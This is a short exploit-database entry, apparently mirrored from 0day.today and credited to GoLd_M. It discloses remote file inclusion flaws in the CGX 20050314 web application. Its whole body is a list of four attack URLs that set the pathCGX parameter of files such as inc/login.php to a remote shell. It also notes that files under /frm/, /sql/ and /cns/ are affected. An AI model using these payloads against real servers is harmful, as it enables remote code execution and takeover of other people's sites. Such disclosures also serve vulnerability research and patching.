id: 1847
date: 05/07/2007
title: CGX 20050314 (pathCGX) Remote File Inclusion Vulnerabilities
author: GoLd_M
cves: 

============================================================
CGX 20050314 (pathCGX) Remote File Inclusion Vulnerabilities
============================================================



# CGX 2005-03-14 (pathCGX) Remote File Include Vulnerablites
# Discovered by: GolD_M = [Mahmood_ali]
# Exploit:[Path]/inc/mtdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/ltdialogo.php?pathCGX=Shell
# Exploit:[Path]/inc/login.php?pathCGX=Shell
# Exploit:[Path]/inc/logingecon.php?pathCGX=Shell
# All Files in : /frm/ & /sql/ & /cns/



#  0day.today [2023-03-24]  #